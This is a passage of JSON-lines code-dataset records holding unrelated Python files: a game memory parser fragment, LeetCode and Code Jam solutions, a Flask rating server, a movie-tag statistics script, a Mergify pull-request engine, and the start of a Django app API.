AcquireState.has_everything\n\n def populate_movelists(self, process_handle, data_type):\n movelist_str = self.c[\"NonPlayerDataAddresses\"][data_type]\n movelist_trail = split_str_to_hex(movelist_str)\n\n movelist_address = self.get_value_from_address(process_handle, self.module_address + movelist_trail[0], AddressType._64bit)\n movelist_block = self.get_block_of_data(process_handle, movelist_address, self.c[\"MemoryAddressOffsets\"][\"movelist_size\"])\n\n return movelist_block, movelist_address\n\ndef split_str_to_hex(string):\n return list(map(to_hex, string.split()))\n\ndef to_hex(x):\n return int(x, 16)\n","sub_path":"src/game_parser/GameReader.py","file_name":"GameReader.py","file_ext":"py","file_size_in_byte":12535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"644064137","text":"# A robot is located at the top-left corner of a m x n grid (marked 'Start' in the diagram below).\n\n# The robot can only move either down or right at any point in time. \n# The robot is trying to reach the bottom-right corner of the grid (marked 'Finish' in the diagram below).\n\n# How many possible unique paths are there?\n\n\n# Input: m = 3, n = 2\n# Output: 3\n# Explanation:\n# From the top-left corner, there are a total of 3 ways to reach the bottom-right corner:\n# 1. Right -> Right -> Down\n# 2. Right -> Down -> Right\n# 3. 
Down -> Right -> Right\n\n # Index 0 1 2\n # 0 [s] [] []\n # 1 [] [] []\n # 2 [] [] []\n # 3 [] [] [d] (3,2)\n\ndef helperUniquePaths(rows,cols,memo):\n \n key = str(rows) + \"-\" + str(cols)\n if key in memo:\n return memo[key]\n\n ## Check for invalid squares\n if rows < 0:\n return 0\n if cols < 0:\n return 0\n\n ## Base Case\n ## Return once destination is reached\n if rows == 0 and cols == 0:\n return 1\n else:\n ## Explore\n result = helperUniquePaths(rows,cols - 1,memo) + helperUniquePaths(rows-1,cols,memo)\n memo[key] = result\n\n return memo[key]\n\n\ndef uniquePaths(m, n):\n \"\"\"\n :type m: int\n :type n: int\n :rtype: int\n \"\"\"\n # m is the columns\n # n is the rows\n \n cols = m - 1\n rows = n - 1\n memo = {}\n return helperUniquePaths(cols,rows,memo)\n\n\ndef uniquePathsBottomUp(m,n):\n cols = m\n rows = n\n \n grid = [[0]*(cols) for i in range(rows)] \n \n for row in range(rows):\n for col in range(cols):\n if row == 0 and col == 0:\n grid[row][col] = 1 \n else:\n grid[row][col] = grid[row][col-1] + grid[row-1][col]\n\n return grid[row][col]\n\n\nif __name__ == \"__main__\":\n r = uniquePaths(7,3)\n print (r)\n r = uniquePathsBottomUp(7,3)\n print (r)","sub_path":"Leetcode/dp/unique_paths.py","file_name":"unique_paths.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"97847375","text":"\"\"\"\nThis script runs the FlaskWebProject application using a development server.\n\"\"\"\n\nfrom os import environ\nfrom flask import Flask, jsonify, request, render_template\nfrom xlrd import open_workbook, XLRDError\nfrom lib import nn_predict\n \napp = Flask(__name__)\n\ndef test_book(filename):\n try:\n open_workbook(filename)\n except XLRDError:\n return False\n else:\n return True\n \ndef get_json_response(rows):\n response = jsonify(result = rows)\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n\n@app.route('/get_test_result')\ndef test_result():\n return get_json_response(nn_predict.load_graph())\n\n@app.route('/get_rating')\ndef get_rating():\n args = request.args.getlist('arg', type = float)\n rate(args)\n\n@app.route('/get_rating')\ndef rate(args):\n \"\"\"\n if(len(args) == 21):\n return nn_predict.rate(args)\n else:\n \"\"\"\n return \"-1 NOT AVAILABLE\"\n\n@app.route('/rating_result')\ndef rating_result():\n args = request.args.getlist('arg', type = float)\n compliance = request.args.get('compliance', default=0, type = int)\n office_ratio = request.args.get('officeRatio', default=0, type = float)\n windows_ratio = request.args.get('windowsRatio', default=0, type = float)\n sql_ratio = request.args.get('SQLRatio', default=0, type = float)\n win_factor = (1 - windows_ratio) * 10\n office_factor = (1 - office_ratio) * 10\n sql_factor = (1 - sql_ratio) * 10\n #for input in test_inputs.in_data:\n #print(\"\"\"Company: {0}, Rating: {1}\"\"\".format(input['company_name'], nn_predict.rateFromDict(input)))\n #rating = 100 - int(compliance) - (5 * (3 - int(rate(args)))) - win_factor - office_factor - sql_factor\n #data = {'rating': str(rating), 'windows_ratio': windows_ratio, 'sql_ratio': sql_ratio, 'office_ratio': office_ratio}\n data = {'rating': str(90), 'windows_ratio': windows_ratio, 'sql_ratio': sql_ratio, 'office_ratio': office_ratio}\n return render_template('result.html', data=data)\n \n@app.route('/rate_excel', methods = ['GET', 'POST'])\ndef rate_excel():\n data = {'rating': '0', 'test': ''}\n if request.method == 'POST':\n f = 
request.files['file']\n f.save(f.filename)\n wb = open_workbook(f.filename)\n test_string = ''\n s = wb.sheet_by_index(0)\n col_names = s.row(0)\n max_row = s.nrows\n row_count = max_row - 1\n rating = 0\n for row in range(1, max_row):\n row_dict = {}\n for name, col in zip(col_names, range(s.ncols)):\n value = (s.cell(row,col).value)\n try : value = float(value)\n except : pass\n row_dict[name.value] = value\n try: rating += int(nn_predict.rateFromDict(row_dict))\n except : \n print(\"Error calling nn_predict.rateFromDict()\")\n pass\n data = {'rating': str(float(rating / row_count)), 'test': test_string}\n return render_template('excel_result.html', data=data)\n\n@app.route('/')\n@app.route('/home')\ndef home():\n return render_template('form.html')\n\n@app.route('/excel')\n@app.route('/batch_rating')\ndef batch_rating():\n return render_template('batch_rating.html')\n\n\nif __name__ == '__main__':\n HOST = environ.get('SERVER_HOST', '0.0.0.0')\n try:\n PORT = int(environ.get('SERVER_PORT', '5555'))\n except ValueError:\n PORT = 5555\n app.run(HOST, PORT)\n","sub_path":"runserver.py","file_name":"runserver.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"66216846","text":"t = int(input()) \r\nfor i in range(1, t + 1):\r\n n = int(input())\r\n vals = [int(si) for si in input().split()]\r\n \r\n abccap = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n\r\n #print(max(vals))\r\n res = ''\r\n maxv = max(vals)\r\n while maxv:\r\n #print(vals)\r\n if vals.count(maxv) > 1 and ((len(vals) - vals.count(0)) > 3 or (len(vals) - vals.count(0)) == 2):\r\n maxi = vals.index(maxv)\r\n maxj = vals.index(maxv, maxi + 1)\r\n vals[maxi] -= 1\r\n vals[maxj] -= 1\r\n res += abccap[maxi] + abccap[maxj] + ' '\r\n else:\r\n maxi = vals.index(maxv)\r\n vals[maxi] -= 1\r\n res += abccap[maxi] + ' '\r\n maxv = max(vals)\r\n\r\n print('Case #{}: {}'.format(i, res))\r\n","sub_path":"solutions_5753053697277952_0/Python/fooMichael/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"244597103","text":"\"\"\"\nStatistics functions and scripts for the raw data\n\"\"\"\n\nimport json\nimport os\nimport time\nimport collections\n\nimport numpy as np\n\nfrom static import *\n\n\nf = open(all_tags_file, encoding='utf-8')\nall_tags_content = json.load(f)\ncount_all_tagged_movies = len(all_tags_content)\n\n\ndef get_files(file_dir):\n for root, dirs, files in os.walk(file_dir):\n # print(root) # current directory path\n # print(dirs) # all subdirectories under the current path\n # print(files) # all non-directory files under the current path\n files\n return files\n\n\nfiles = get_files(all_movies_dir)\n\n\n# Count the json files in a directory and the number of records in their data arrays\ndef count_all_files(root_dir, files):\n file_count = 0 # how many files were opened in total\n count = 0 # how many records in total\n for file in files:\n file_root = os.path.join(root_dir, file)\n f = open(file_root, encoding='utf-8')\n content = json.load(f)\n data = content[\"data\"] # data is a list; each record is a dict\n count += len(data)\n if len(data):\n file_count += 1\n f.close()\n return count, file_count\n\n\ncount_all_movies, _ = count_all_files(all_movies_dir, files)\nprint(\"Tagged movies vs. all movies: \", end='')\nprint(count_all_tagged_movies, count_all_movies)\nprint()\n\nmovie_order = 0\ntag_order = 0\nmovie_order_dict = {}\nmovie_list = []\ntag_order_dict = collections.OrderedDict()\n\ntags_set = set()\ntags_times = 0\nfor movie, tags in all_tags_content.items():\n tags_times += tags.__len__()\n tags_set.update(tags)\nprint(\"Tag set size and total tagging count: \", 
end='')\nprint(tags_set.__len__(), tags_times)\nprint()\n\nfor tag in tags_set:\n tag_order_dict[tag] = tag_order\n tag_order += 1\n\n\nuser_item_matrix = np.zeros([count_all_movies, tags_set.__len__()], dtype=np.int32)\n\nfor movie, tags in all_tags_content.items():\n movie_order_dict[movie] = movie_order # forward lookup: movie -> index\n movie_list.append(movie) # reverse lookup: index -> movie\n for tag in tags:\n tag_pos = tag_order_dict[tag]\n user_item_matrix[movie_order, tag_pos] += 1\n movie_order += 1\n\n\n# Walk the file tree and print every file\ndef walkdir(dirname):\n try:\n ls = os.listdir(dirname)\n except:\n print('access denied')\n else:\n for l in ls:\n temp = os.path.join(dirname, l)\n if os.path.isdir(temp):\n walkdir(temp)\n else:\n print(temp)\n\n\n# Get the first-level subdirectories of a directory; used together with get_files()\ndef walk_into_dir(dirname):\n dir_list = []\n ls = os.listdir(dirname)\n for item in ls:\n temp = os.path.join(dirname, item)\n if os.path.isdir(temp):\n # temp += '\\\\'\n dir_list.append(temp)\n return dir_list\n\n\n# This heavy file-I/O block is not meant to be executed; just note the recorded results\n'''\nstart = time.time()\nreview_dir = walk_into_dir(movie_review_dir)\ncount_reviewed_movies = 0\nreviews = 0\nfor root_dir in review_dir:\n files = get_files(root_dir)\n count = count_all_files(root_dir, files)\n reviews += count[0]\n if count[1]:\n count_reviewed_movies += count[1]\nprint(count_reviewed_movies, reviews)\nprint(time.time() - start)\n# Result: 36540 1691793 # ~36.5k movies have long reviews; ~1.69M long reviews in total\n'''\n\n\n# For one review directory, check whether every reviewed movie also has tags (iterates the dict)\ndef check(root_dir, files):\n check_count = 0\n file_count = 0\n for file in files:\n file_root = os.path.join(root_dir, file)\n f = open(file_root, encoding='utf-8')\n content = json.load(f)\n file_count += 1\n data = content[\"data\"] # data is a list; each record is a dict\n if len(data):\n if os.path.splitext(file)[0] not in movie_order_dict.keys():\n check_count += 1\n f.close()\n return file_count, check_count\n\n\n'''\nreview_dir = walk_into_dir(movie_review_dir)\nfile_count = check_count = 0\nfor root_dir in review_dir:\n files = get_files(root_dir)\n tmp = check(root_dir, files)\n file_count += tmp[0]\n check_count += tmp[1]\nprint(file_count, check_count)\n# Result: review files: 59548; movies with reviews but no tags: 4325\n'''\n\n# Collect every movie's rating into a dict\ndef get_movie_rate_dict():\n movie_rate_dict = {}\n for file in files:\n # print(\"current file\", file)\n file_root = os.path.join(all_movies_dir, file)\n f = open(file_root, encoding='utf-8')\n content = json.load(f)\n data = content[\"data\"] # data is a list; each record is a dict\n for record in data:\n cur_movie = record['id']\n movie_rate_dict[cur_movie] = float(file[:3])\n f.close()\n return movie_rate_dict\n\n\nmovie_rate_dict = get_movie_rate_dict()\n\n# Build the rating matrix for the ~59000 movies\ndef generate_all_movie_rates():\n movie_rate_pos_dict = {}\n movie_rates_matrix = np.zeros([count_all_movies, tags_set.__len__()], dtype=np.int32)\n y = np.zeros([count_all_movies, 1], dtype=np.float32) # rating targets, indexed by position\n pos = 0\n for movie, rate in movie_rate_dict.items():\n y[pos] = rate\n movie_rate_pos_dict[movie] = pos\n movie_pos = movie_order_dict.get(movie, -1)\n if movie_pos > -1:\n movie_rates_matrix[pos] = user_item_matrix[movie_pos]\n else:\n pass\n pos += 1\n return movie_rates_matrix, y, movie_rate_pos_dict\n\nmovie_rates_matrix, movie_rates_y, movie_rate_pos_dict = generate_all_movie_rates()\n# np.save(os.path.join(workdir, 'movie_rates_matrix.npy'), movie_rates_matrix)\n# np.save(os.path.join(workdir, 'movie_rates_y.npy'), 
movie_rates_y)","sub_path":"SVD/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":5678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649929792","text":"# -*- encoding: utf-8 -*-\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport itertools\nimport json\nfrom concurrent import futures\n\nimport attr\n\nimport daiquiri\n\nimport github\n\nimport tenacity\n\nimport uhashring\n\nfrom mergify_engine import backports\nfrom mergify_engine import branch_protection\nfrom mergify_engine import branch_updater\nfrom mergify_engine import check_api\nfrom mergify_engine import config\nfrom mergify_engine import mergify_pull\nfrom mergify_engine import rules\nfrom mergify_engine import utils\nfrom mergify_engine.worker import app\n\n\nLOG = daiquiri.getLogger(__name__)\n\n\ndef get_ring(topology, kind):\n return uhashring.HashRing(\n nodes=list(itertools.chain.from_iterable(\n map(lambda x: \"worker-%s-%003d@%s\" % (kind, x, fqdn), range(w))\n for fqdn, w in sorted(topology.items())\n )))\n\n\nRINGS_PER_SUBSCRIPTION = {\n True: get_ring(config.TOPOLOGY_SUBSCRIBED, \"sub\"),\n False: get_ring(config.TOPOLOGY_FREE, \"free\")\n}\n\n\n@app.task\ndef handle(installation_id, installation_token, subscription,\n branch_rules, event_type, data, event_pull_raw):\n # NOTE(sileht): The processor is not concurrency safe, so a repo is always\n # sent to the same worker.\n # This work in coordination with app.conf.worker_direct = True that creates\n # a dedicated queue on exchange c.dq2 for each worker\n #ring = RINGS_PER_SUBSCRIPTION[subscription[\"subscribed\"]]\n ring = get_ring(config.TOPOLOGY_FREE, \"free\")\n routing_key = ring.get_node(data[\"repository\"][\"full_name\"])\n LOG.info(\"Sending repo %s to %s\", data[\"repository\"][\"full_name\"],\n routing_key)\n\n _handle.s(installation_id, installation_token, subscription,\n branch_rules, event_type, data, event_pull_raw\n ).apply_async(exchange='C.dq2', routing_key=routing_key)\n\n # _handle(installation_id, installation_token, subscription,\n # branch_rules, event_type, data, event_pull_raw)\n\n@app.task\ndef _handle(installation_id, installation_token, subscription,\n branch_rules, event_type, data, event_pull_raw):\n pull = mergify_pull.MergifyPull.from_raw(installation_id,\n installation_token,\n event_pull_raw)\n MergifyEngine(installation_id, installation_token, subscription,\n pull.g_pull.base.repo).handle(\n branch_rules, event_type, data, pull)\n\n\n@attr.s\nclass Caching(object):\n repository = attr.ib()\n installation_id = attr.ib()\n _redis = attr.ib(factory=utils.get_redis_for_cache, init=False)\n\n def _get_logprefix(self, branch=\"\"):\n return (self.repository.owner.login + \"/\" + self.repository.name +\n \"/pull/XXX@\" + branch + \" (-)\")\n\n def _get_cache_key(self, branch):\n # Use only IDs, not name\n return \"queues~%s~%s~%s~%s~%s\" % (\n self.installation_id, self.repository.owner.login.lower(),\n self.repository.name.lower(), self.repository.private, 
branch)\n\n def _cache_save_pull(self, pull):\n key = self._get_cache_key(pull.g_pull.base.ref)\n self._redis.hset(key, pull.g_pull.number, json.dumps(pull.jsonify()))\n\n def _cache_remove_pull(self, pull):\n key = self._get_cache_key(pull.g_pull.base.ref)\n self._redis.hdel(key, pull.g_pull.number)\n\n def _get_cached_branches(self):\n return [b.split('~')[5] for b in\n self._redis.keys(self._get_cache_key(\"*\"))]\n\n def get_cache_for_pull_number(self, current_branch, number):\n key = self._get_cache_key(current_branch)\n p = self._redis.hget(key, number)\n return {} if p is None else json.loads(p)\n\n def get_pr_for_pull_number(self, current_branch, number):\n p = self.get_cache_for_pull_number(current_branch, number)\n if p:\n return github.PullRequest.PullRequest(\n self.repository._requester, {}, p,\n completed=True)\n\n def get_pr_for_sha(self, sha):\n for branch in self._get_cached_branches():\n incoming_pull = self._get_cache_for_pull_sha(branch, sha)\n if incoming_pull:\n return github.PullRequest.PullRequest(\n self.repository._requester, {}, incoming_pull,\n completed=True)\n\n def _get_cache_for_pull_sha(self, current_branch, sha):\n key = self._get_cache_key(current_branch)\n raw_pulls = self._redis.hgetall(key)\n for pull in raw_pulls.values():\n pull = json.loads(pull)\n if pull[\"head\"][\"sha\"] == sha:\n return pull\n return {} # pragma: no cover\n\n\nclass MergifyEngine(Caching):\n def __init__(self, installation_id, installation_token,\n subscription, repo):\n super(MergifyEngine, self).__init__(repository=repo,\n installation_id=installation_id)\n self._installation_token = installation_token\n self._subscription = subscription\n\n def handle(self, branch_rules, event_type, data, incoming_pull):\n # Everything start here\n incoming_branch = incoming_pull.g_pull.base.ref\n incoming_state = incoming_pull.g_pull.state\n\n try:\n branch_rule = rules.get_branch_rule(branch_rules, incoming_branch)\n except rules.InvalidRules as e: # pragma: no cover\n # Not configured, post status check with the error message\n if (event_type == \"pull_request\" and\n data[\"action\"] in [\"opened\", \"synchronize\"]):\n check_api.set_check_run(\n incoming_pull.g_pull, \"current-config-checker\",\n \"completed\", \"failure\", output={\n \"title\": \"The Mergify configuration is invalid\",\n \"summary\": str(e)\n })\n\n return\n\n try:\n branch_protection.configure_protection_if_needed(\n self.repository, incoming_branch, branch_rule)\n except github.GithubException as e: # pragma: no cover\n if e.status == 404 and e.data[\"message\"] == \"Branch not found\":\n LOG.info(\"head branch no longer exists\",\n pull_request=incoming_pull)\n return\n raise\n\n if not branch_rule:\n LOG.info(\"Mergify disabled on branch\", branch=incoming_branch)\n return\n\n # PULL REQUEST UPDATER\n\n collaborators = [u.id for u in self.repository.get_collaborators()]\n\n if incoming_state == \"closed\":\n self._cache_remove_pull(incoming_pull)\n LOG.info(\"Just update cache (pull request closed)\")\n\n if (event_type == \"pull_request\" and\n data[\"action\"] in [\"closed\", \"labeled\"] and\n incoming_pull.g_pull.merged):\n backports.backport_from_labels(\n incoming_pull,\n branch_rule[\"automated_backport_labels\"],\n self._installation_token)\n\n if event_type == \"pull_request\" and data[\"action\"] == \"closed\":\n self.get_processor().proceed_queue(\n incoming_branch, branch_rule, collaborators)\n\n if not incoming_pull.g_pull.merged:\n incoming_pull.post_check_status(\n \"success\", \"Pull request closed 
unmerged\")\n\n head_branch = incoming_pull.g_pull.head.ref\n if head_branch.startswith(\"mergify/bp/%s\" % incoming_branch):\n try:\n self.repository.get_git_ref(\n \"heads/%s\" % head_branch\n ).delete()\n LOG.info(\"branch deleted\",\n pull_request=incoming_pull,\n branch=head_branch)\n except github.GithubException as e: # pragma: no cover\n if e.status != 404:\n raise\n\n return\n\n # First, remove informations we don't want to get from cache, so their\n # will be recomputed by MergifyPull.complete()\n if event_type == \"refresh\":\n cache = {}\n old_status = None\n else:\n cache = self.get_cache_for_pull_number(incoming_branch,\n incoming_pull.g_pull.number)\n cache = dict((k, v) for k, v in cache.items()\n if k.startswith(\"mergify_engine_\"))\n old_status = cache.pop(\"mergify_engine_status\", None)\n if event_type in [\"status\", \"check_run\", \"check_suite\"]:\n cache.pop(\"mergify_engine_required_statuses\", None)\n elif event_type == \"pull_request_review\":\n cache.pop(\"mergify_engine_reviews_ok\", None)\n cache.pop(\"mergify_engine_reviews_ko\", None)\n elif (event_type == \"pull_request\" and\n data[\"action\"] == \"synchronize\"):\n cache.pop(\"mergify_engine_required_statuses\", None)\n\n changed = incoming_pull.complete(cache, branch_rule, collaborators)\n if changed:\n self._cache_save_pull(incoming_pull)\n\n if (event_type == \"pull_request_review\" and\n data[\"review\"][\"user\"][\"id\"] not in collaborators):\n LOG.info(\"Just update cache (pull_request_review non-collab)\")\n return\n\n # NOTE(sileht): PullRequest updated or comment posted, maybe we need to\n # update github\n # Get and refresh the queues\n if old_status != incoming_pull.status:\n incoming_pull.post_check_status(\n incoming_pull.github_state,\n incoming_pull.github_description,\n )\n\n self.get_processor().proceed_queue(\n incoming_branch, branch_rule, collaborators)\n\n def get_processor(self):\n return Processor(subscription=self._subscription,\n repository=self.repository,\n installation_id=self.installation_id)\n\n\nclass Processor(Caching):\n def __init__(self, subscription, repository, installation_id):\n super(Processor, self).__init__(repository=repository,\n installation_id=installation_id)\n self._subscription = subscription\n\n def _build_queue(self, branch, branch_rule, collaborators):\n \"\"\"Return the pull requests from redis cache ordered by sort status.\"\"\"\n data = self._redis.hgetall(self._get_cache_key(branch))\n\n with futures.ThreadPoolExecutor(\n max_workers=config.FETCH_WORKERS) as tpe:\n pulls = sorted(tpe.map(\n lambda p: self._load_from_cache_and_complete(\n p, branch_rule, collaborators),\n data.values()))\n LOG.info(\"%s, queues content:\", self._get_logprefix(branch))\n for p in pulls:\n LOG.info(\"sha: %s->%s\",\n p.g_pull.base.sha, p.g_pull.head.sha,\n pull_request=p)\n return pulls\n\n def _load_from_cache_and_complete(self, data, branch_rule, collaborators):\n data = json.loads(data)\n pull = mergify_pull.MergifyPull(\n github.PullRequest.PullRequest(self.repository._requester, {},\n data, completed=True),\n self.installation_id)\n changed = pull.complete(data, branch_rule, collaborators)\n if changed:\n self._cache_save_pull(pull)\n return pull\n\n def _get_next_pull_to_processed(self, branch, branch_rule, collaborators):\n \"\"\"Return the next pull request to proceed.\n\n This take the pull request with the higher status that is not yet\n closed.\n \"\"\"\n queue = self._build_queue(branch, branch_rule, collaborators)\n\n while queue:\n p = queue.pop(0)\n\n 
if p.mergify_state == mergify_pull.MergifyState.NOT_READY:\n                continue\n\n            expected_state = p.mergify_state\n\n            # NOTE(sileht): We refresh it before processing, because the cache\n            # can be outdated, user may have manually merged the PR or\n            # mergify_state may have changed by an event not yet received.\n\n            # FIXME(sileht): This will refresh the first pull request of the\n            # queue on each event. To limit this almost useless refresh, we\n            # should be smarted on when we call proceed_queue()\n            p.refresh(branch_rule, collaborators)\n            self._cache_save_pull(p)\n\n            if p.g_pull.state == \"closed\":\n                # NOTE(sileht): PR merged in the meantime or manually\n                self._cache_remove_pull(p)\n            elif expected_state != p.mergify_state:\n                # NOTE(sileht): The state have changed, put back the pull into\n                # the queue and resort it\n                queue.append(p)\n                queue.sort()\n            else:\n                return p\n\n    @tenacity.retry(retry=tenacity.retry_never)\n    def proceed_queue(self, branch, branch_rule, collaborators):\n\n        p = self._get_next_pull_to_processed(\n            branch, branch_rule, collaborators)\n        if not p:\n            LOG.info(\"nothing to do\",\n                     repository=self.repository.full_name,\n                     branch=branch)\n            return\n\n        if p.mergify_state == mergify_pull.MergifyState.READY:\n            p.post_check_status(\"success\", \"Merged\")\n\n            if p.merge(branch_rule[\"merge_strategy\"][\"method\"],\n                       branch_rule[\"merge_strategy\"][\"rebase_fallback\"]):\n                # Wait for the closed event now\n                LOG.info(\"merged\", pull_request=p)\n            else: # pragma: no cover\n                p.set_and_post_error(\"Merge fail\")\n                self._cache_save_pull(p)\n                raise tenacity.TryAgain\n\n        elif p.mergify_state == mergify_pull.MergifyState.ALMOST_READY:\n            LOG.info(\"waiting for final statuses completion\", pull_request=p)\n\n        elif p.mergify_state == mergify_pull.MergifyState.NEED_BRANCH_UPDATE:\n            if branch_updater.update(p, self._subscription[\"token\"]):\n                # Wait for the synchronize event now\n                LOG.info(\"branch updated\", pull_request=p)\n            else: # pragma: no cover\n                p.set_and_post_error(\"contributor branch is not updatable, \"\n                                     \"manual update/rebase required.\")\n                self._cache_save_pull(p)\n                raise tenacity.TryAgain\n","sub_path":"mergify_engine/tasks/engine/v1.py","file_name":"v1.py","file_ext":"py","file_size_in_byte":15206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"151724601","text":"from typing import List\n\n# Use binary search\nclass Solution:\n    def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n        if not matrix or not matrix[0]:return False\n        m, n = len(matrix), len(matrix[0])\n        l1, r1 = 0, m-1\n        l2, r2 = 0, n-1\n        m1, m2 = 0, 0\n        while l1 <= r1:\n            m1 = (l1 + r1)//2\n            if target >= matrix[m1][0] and target <= matrix[m1][-1]:\n                break\n            elif target < matrix[m1][0]:\n                r1 = m1 - 1\n            else:\n                l1 = m1 + 1\n        while l2 <= r2:\n            m2 = (l2 + r2)//2\n            if matrix[m1][m2] == target:\n                return True\n            elif target > matrix[m1][m2]:\n                l2 = m2 + 1\n            else:\n                r2 = m2 - 1\n        return False\n\n# Method 2: one binary search over the whole matrix treated as a single sorted array. Compare matrix[mid//n][mid%n] with target, where n is the length of the inner arrays\nclass Solution2:\n    def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n        if not matrix or not matrix[0]:return False\n        # m, n = len(matrix)-1, len(matrix[0])-1\n        m, n = len(matrix), len(matrix[0])\n        l, r = 0, m*n-1\n        while l <= r:\n            mid = (l+r)//2\n            # if matrix[mid//n][mid%m] == target:\n            #     return True\n            if matrix[mid//n][mid%n] < target:\n                l = mid + 1\n            elif matrix[mid//n][mid%n] > target:\n                r = mid - 1\n            else:\n                return True\n        return 
False","sub_path":"Week_04/74_searchmatrix.py","file_name":"74_searchmatrix.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"347250691","text":"from django.conf import settings, urls\nfrom django.db import transaction\nfrom django.db.models import Q\nfrom django.views import debug\n\nimport commonware.log\nimport waffle\nfrom celery_tasktree import TaskTree\nimport raven.base\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework import generics\nfrom rest_framework.mixins import ListModelMixin, RetrieveModelMixin\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework.serializers import (BooleanField, CharField,\n ChoiceField,\n DecimalField,\n HyperlinkedIdentityField,\n HyperlinkedRelatedField,\n ModelSerializer)\nfrom rest_framework.viewsets import GenericViewSet, ModelViewSet\n\nfrom tastypie import fields, http\nfrom tastypie.serializers import Serializer\nfrom tastypie.throttle import CacheThrottle\nfrom tastypie.utils import trailing_slash\n\nimport amo\nfrom amo.utils import memoize\nfrom addons.forms import CategoryFormSet\nfrom addons.models import Addon, AddonUser, Category, Webapp\nfrom amo.decorators import write\nfrom amo.utils import no_translation\nfrom constants.applications import DEVICE_TYPES\nfrom constants.payments import PAYMENT_METHOD_CHOICES, PROVIDER_CHOICES\nfrom files.models import Platform\nfrom lib.metrics import record_action\nfrom market.models import AddonPremium, Price, PriceCurrency\n\nfrom mkt.api.authentication import (SharedSecretAuthentication,\n OptionalOAuthAuthentication,\n RestOAuthAuthentication)\nfrom mkt.api.authorization import (AllowAppOwner, AllowReviewerReadOnly,\n AppOwnerAuthorization, GroupPermission,\n OwnerAuthorization)\nfrom mkt.api.base import (CORSMixin, CORSResource, GenericObject, http_error,\n MarketplaceModelResource, MarketplaceResource)\nfrom mkt.api.forms import (CategoryForm, DeviceTypeForm, UploadForm)\nfrom mkt.api.http import HttpLegallyUnavailable\nfrom mkt.carriers import CARRIER_MAP, CARRIERS, get_carrier_id\nfrom mkt.developers import tasks\nfrom mkt.regions import get_region, get_region_id, REGIONS_DICT\nfrom mkt.submit.forms import AppDetailsBasicForm\nfrom mkt.webapps.models import get_excluded_in\nfrom mkt.webapps.tasks import _update_manifest\nfrom mkt.webapps.utils import app_to_dict\n\nlog = commonware.log.getLogger('z.api')\n\n\nclass AppResource(CORSResource, MarketplaceModelResource):\n payment_account = fields.ToOneField('mkt.developers.api.AccountResource',\n 'app_payment_account', null=True)\n premium_type = fields.IntegerField(null=True)\n previews = fields.ToManyField('mkt.submit.api.PreviewResource',\n 'previews', readonly=True)\n upsold = fields.ToOneField('mkt.api.resources.AppResource', 'upsold',\n null=True)\n\n class Meta(MarketplaceModelResource.Meta):\n queryset = Webapp.objects.all() # Gets overriden in dispatch.\n fields = ['categories', 'description', 'device_types', 'homepage',\n 'id', 'name', 'payment_account', 'premium_type',\n 'status', 'support_email', 'support_url']\n list_allowed_methods = ['get', 'post']\n detail_allowed_methods = ['get', 'put', 'delete']\n always_return_data = True\n authentication = (SharedSecretAuthentication(),\n OptionalOAuthAuthentication())\n authorization = AppOwnerAuthorization()\n resource_name = 'app'\n serializer = Serializer(formats=['json'])\n slug_lookup = 
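An aside on the 74_searchmatrix.py record that closes above: Solution2 leans on the row-major identity that flat index k of an m-row, n-column matrix lives at matrix[k // n][k % n]. A quick standalone check, assuming Solution2 from that record is in scope:

# Row-major identity behind Solution2: flat index k maps to matrix[k // n][k % n].
matrix = [[1, 3, 5, 7],
          [10, 11, 16, 20],
          [23, 30, 34, 60]]
n = len(matrix[0])
flat = [x for row in matrix for x in row]
assert all(flat[k] == matrix[k // n][k % n] for k in range(len(flat)))

sol = Solution2()  # from the record above
assert sol.searchMatrix(matrix, 16)
assert not sol.searchMatrix(matrix, 17)
print("flattened binary search agrees with a linear scan over", flat)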
'app_slug'\n # Throttle users without Apps:APIUnthrottled at 10 POST requests/day.\n throttle = CacheThrottle(throttle_at=10, timeframe=60 * 60 * 24)\n\n def dispatch(self, request_type, request, **kwargs):\n # Using `Webapp.objects.all()` here forces a new queryset, which for\n # now avoids bug 854505. We're also using this to filter by flagged\n # apps.\n self._meta.queryset_base = Webapp.objects.all()\n self._meta.queryset = self._meta.queryset_base.exclude(\n id__in=get_excluded_in(REGIONS_DICT[get_region()].id))\n return super(AppResource, self).dispatch(request_type, request,\n **kwargs)\n\n @write\n @transaction.commit_on_success\n def obj_create(self, bundle, request, **kwargs):\n form = UploadForm(bundle.data)\n\n if not request.amo_user.read_dev_agreement:\n log.info(u'Attempt to use API without dev agreement: %s'\n % request.amo_user.pk)\n raise http_error(http.HttpUnauthorized,\n 'Terms of service not accepted.')\n\n if not form.is_valid():\n raise self.form_errors(form)\n\n if not (OwnerAuthorization()\n .is_authorized(request, object=form.obj)):\n raise http_error(http.HttpForbidden,\n 'You do not own that app.')\n\n plats = [Platform.objects.get(id=amo.PLATFORM_ALL.id)]\n\n # Create app, user and fetch the icon.\n bundle.obj = Addon.from_upload(form.obj, plats,\n 